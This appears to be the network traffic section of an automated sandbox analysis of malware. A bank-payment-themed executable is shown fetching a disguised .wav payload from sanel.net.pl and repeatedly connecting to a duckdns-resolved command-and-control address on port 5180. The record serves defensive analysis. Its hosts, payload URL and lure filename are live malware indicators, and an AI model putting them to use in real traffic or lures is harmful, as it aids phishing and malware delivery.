                                            Dec 12, 2024 12:36:14.706265926 CET497165180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:14.826030970 CET518049716194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:14.826208115 CET497165180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:14.946132898 CET518049716194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:17.170382023 CET518049716194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:17.170459032 CET497165180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.170568943 CET497165180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.171418905 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.290852070 CET518049716194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:17.292032957 CET518049717194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:17.292161942 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.293270111 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.412904978 CET518049717194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:17.413018942 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:17.532730103 CET518049717194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:19.455463886 CET518049717194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:19.455605030 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.456245899 CET497175180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.457223892 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.576010942 CET518049717194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:19.576968908 CET518049718194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:19.577069044 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.577928066 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.697633982 CET518049718194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:19.697745085 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:19.817588091 CET518049718194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:21.752927065 CET518049718194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:21.753067970 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:21.753362894 CET497185180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:21.754271030 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:21.873080969 CET518049718194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:21.874003887 CET518049719194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:21.874134064 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:21.875077009 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:21.994810104 CET518049719194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:21.994947910 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:22.114926100 CET518049719194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:24.069780111 CET518049719194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:24.069859982 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.069977999 CET497195180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.071058989 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.189620018 CET518049719194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:24.190797091 CET518049720194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:24.190918922 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.191703081 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.311403036 CET518049720194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:24.311542034 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:24.431227922 CET518049720194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:26.365190983 CET518049720194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:26.365303993 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.365451097 CET497205180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.366874933 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.485431910 CET518049720194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:26.486675978 CET518049722194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:26.486756086 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.487611055 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.607374907 CET518049722194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:26.607549906 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:26.727526903 CET518049722194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:28.658668995 CET518049722194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:28.658802986 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:28.658952951 CET497225180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:28.659827948 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:28.779198885 CET518049722194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:28.779560089 CET518049723194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:28.779762983 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:28.780710936 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:28.900326967 CET518049723194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:28.900444031 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:29.020315886 CET518049723194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:30.955893040 CET518049723194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:30.955979109 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:30.956136942 CET497235180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:30.957144976 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:31.075843096 CET518049723194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:31.077486038 CET518049724194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:31.077627897 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:31.078483105 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:31.198353052 CET518049724194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:31.198427916 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:31.319015980 CET518049724194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:33.272279978 CET518049724194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:33.272356033 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.272494078 CET497245180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.273399115 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.392406940 CET518049724194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:33.393165112 CET518049725194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:33.393269062 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.394169092 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.513916016 CET518049725194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:33.513995886 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:33.633903027 CET518049725194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:35.565474033 CET518049725194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:35.565606117 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.565727949 CET497255180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.566531897 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.685446024 CET518049725194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:35.686220884 CET518049726194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:35.686892986 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.688622952 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.808321953 CET518049726194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:35.808480978 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:35.928349018 CET518049726194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:37.881683111 CET518049726194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:37.881983042 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:37.881983042 CET497265180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:37.882935047 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:38.001750946 CET518049726194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:38.002631903 CET518049727194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:38.002749920 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:38.003608942 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:38.123344898 CET518049727194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:38.123423100 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:38.243098021 CET518049727194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:40.174659967 CET518049727194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:40.174897909 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.174897909 CET497275180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.176407099 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.294812918 CET518049727194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:40.296153069 CET518049728194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:40.296253920 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.297127008 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.416979074 CET518049728194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:40.417126894 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:40.536923885 CET518049728194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:42.491451025 CET518049728194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:42.491688013 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.491688013 CET497285180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.492750883 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.611713886 CET518049728194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:42.612494946 CET518049729194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:42.612648010 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.613620043 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.734319925 CET518049729194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:42.734447002 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:42.854145050 CET518049729194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:44.803293943 CET518049729194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:44.803427935 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:44.803582907 CET497295180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:44.804620028 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:44.923885107 CET518049729194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:44.924459934 CET518049730194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:44.924580097 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:44.925457001 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:45.045134068 CET518049730194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:45.045258999 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:45.165021896 CET518049730194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:47.103620052 CET518049730194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:47.103768110 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.103960037 CET497305180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.105030060 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.223891020 CET518049730194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:47.224816084 CET518049731194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:47.224908113 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.225847006 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.345746994 CET518049731194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:47.345855951 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:47.465666056 CET518049731194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:49.393851995 CET518049731194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:49.393968105 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.394084930 CET497315180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.395083904 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.513912916 CET518049731194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:49.514810085 CET518049732194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:49.514944077 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.515834093 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.635579109 CET518049732194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:49.635715961 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:49.755573988 CET518049732194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:51.711046934 CET518049732194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:51.711118937 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:51.711273909 CET497325180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:51.831147909 CET518049732194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:52.063282967 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:52.183346987 CET518049733194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:52.183445930 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:52.184263945 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:52.303931952 CET518049733194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:52.303991079 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:52.424077034 CET518049733194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:54.348229885 CET518049733194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:54.348306894 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.348462105 CET497335180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.349375963 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.468213081 CET518049733194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:54.469219923 CET518049734194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:54.469367981 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.470149994 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.589940071 CET518049734194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:54.590045929 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:54.710144997 CET518049734194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:56.648303032 CET518049734194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:56.648422003 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:56.648545027 CET497345180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:56.649626970 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:56.768330097 CET518049734194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:56.769351959 CET518049735194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:56.769458055 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:56.770438910 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:56.890290976 CET518049735194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:56.890394926 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:57.010387897 CET518049735194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:58.940548897 CET518049735194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:58.940736055 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:58.940795898 CET497355180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:58.941788912 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:59.060741901 CET518049735194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:59.061820030 CET518049736194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:59.061934948 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:59.062974930 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:59.183182001 CET518049736194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:36:59.183334112 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:36:59.303234100 CET518049736194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:01.257302999 CET518049736194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:01.257395029 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.257510900 CET497365180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.258492947 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.377197981 CET518049736194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:01.378231049 CET518049737194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:01.378329992 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.379174948 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.498853922 CET518049737194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:01.499002934 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:01.620079994 CET518049737194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:03.569749117 CET518049737194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:03.569856882 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.569997072 CET497375180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.570933104 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.689752102 CET518049737194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:03.690721035 CET518049738194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:03.690843105 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.691742897 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.811489105 CET518049738194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:03.811649084 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:03.931509018 CET518049738194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:05.863336086 CET518049738194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:05.863466978 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:05.863596916 CET497385180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:05.864507914 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:05.983381987 CET518049738194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:05.984411001 CET518049739194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:05.984627008 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:05.985431910 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:06.106436014 CET518049739194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:06.106517076 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:06.226609945 CET518049739194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:08.163073063 CET518049739194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:08.163161039 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.163373947 CET497395180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.164310932 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.283165932 CET518049739194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:08.284007072 CET518049740194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:08.284092903 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.285293102 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.404985905 CET518049740194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:08.405096054 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:08.526758909 CET518049740194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:10.460556030 CET518049740194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:10.460640907 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.460805893 CET497405180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.461791039 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.580521107 CET518049740194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:10.581455946 CET518049741194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:10.581618071 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.582531929 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.702214003 CET518049741194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:10.702358961 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:10.822011948 CET518049741194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:12.753849030 CET518049741194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:12.754252911 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:12.754252911 CET497415180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:12.755273104 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:12.874070883 CET518049741194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:12.874984026 CET518049742194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:12.875092030 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:12.875961065 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:12.995651960 CET518049742194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:12.995733976 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:13.115667105 CET518049742194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:15.050988913 CET518049742194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:15.051073074 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.051225901 CET497425180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.052144051 CET497435180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.170907021 CET518049742194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:15.172967911 CET518049743194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:15.173068047 CET497435180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.174374104 CET497435180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.294172049 CET518049743194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:15.294240952 CET497435180192.168.2.16194.226.169.227
                                            Dec 12, 2024 12:37:15.414150953 CET518049743194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:17.347920895 CET518049743194.226.169.227192.168.2.16
                                            Dec 12, 2024 12:37:17.348047972 CET497435180192.168.2.16194.226.169.227

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 12, 2024 12:35:23.219654083 CET6186753192.168.2.161.1.1.1
                                            Dec 12, 2024 12:35:24.225043058 CET6186753192.168.2.161.1.1.1
                                            Dec 12, 2024 12:35:24.483419895 CET53618671.1.1.1192.168.2.16
                                            Dec 12, 2024 12:35:24.483436108 CET53618671.1.1.1192.168.2.16
                                            Dec 12, 2024 12:35:36.526747942 CET6269953192.168.2.161.1.1.1
                                            Dec 12, 2024 12:35:36.664886951 CET53626991.1.1.1192.168.2.16
                                            Dec 12, 2024 12:35:51.228630066 CET5652353192.168.2.161.1.1.1
                                            Dec 12, 2024 12:35:51.555243969 CET53565231.1.1.1192.168.2.16
                                            Dec 12, 2024 12:36:51.711927891 CET4975453192.168.2.161.1.1.1
                                            Dec 12, 2024 12:36:52.062479973 CET53497541.1.1.1192.168.2.16

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 12, 2024 12:35:23.219654083 CET192.168.2.161.1.1.10xf816Standard query (0)sanel.net.plA (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:24.225043058 CET192.168.2.161.1.1.10xf816Standard query (0)sanel.net.plA (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:36.526747942 CET192.168.2.161.1.1.10x59c5Standard query (0)sanel.net.plA (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:51.228630066 CET192.168.2.161.1.1.10xe8daStandard query (0)scaleofpreferencestill.duckdns.orgA (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:36:51.711927891 CET192.168.2.161.1.1.10xc25dStandard query (0)scaleofpreferencestill.duckdns.orgA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 12, 2024 12:35:24.483419895 CET1.1.1.1192.168.2.160xf816No error (0)sanel.net.pl77.55.253.14A (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:24.483436108 CET1.1.1.1192.168.2.160xf816No error (0)sanel.net.pl77.55.253.14A (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:36.664886951 CET1.1.1.1192.168.2.160x59c5No error (0)sanel.net.pl77.55.253.14A (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:35:51.555243969 CET1.1.1.1192.168.2.160xe8daNo error (0)scaleofpreferencestill.duckdns.org194.226.169.227A (IP address)IN (0x0001)false
                                            Dec 12, 2024 12:36:52.062479973 CET1.1.1.1192.168.2.160xc25dNo error (0)scaleofpreferencestill.duckdns.org194.226.169.227A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • sanel.net.pl

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.164970477.55.253.144437152C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-12 11:35:25 UTC121OUTGET /filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wav HTTP/1.1
                                            Host: sanel.net.pl
                                            Connection: Keep-Alive
                                            2024-12-12 11:35:26 UTC270INHTTP/1.1 200 OK
                                            Date: Thu, 12 Dec 2024 11:35:26 GMT
                                            Server: Apache
                                            X-Content-Type-Options: nosniff
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Wed, 04 Dec 2024 09:13:58 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1303560
                                            Content-Type: audio/x-wav
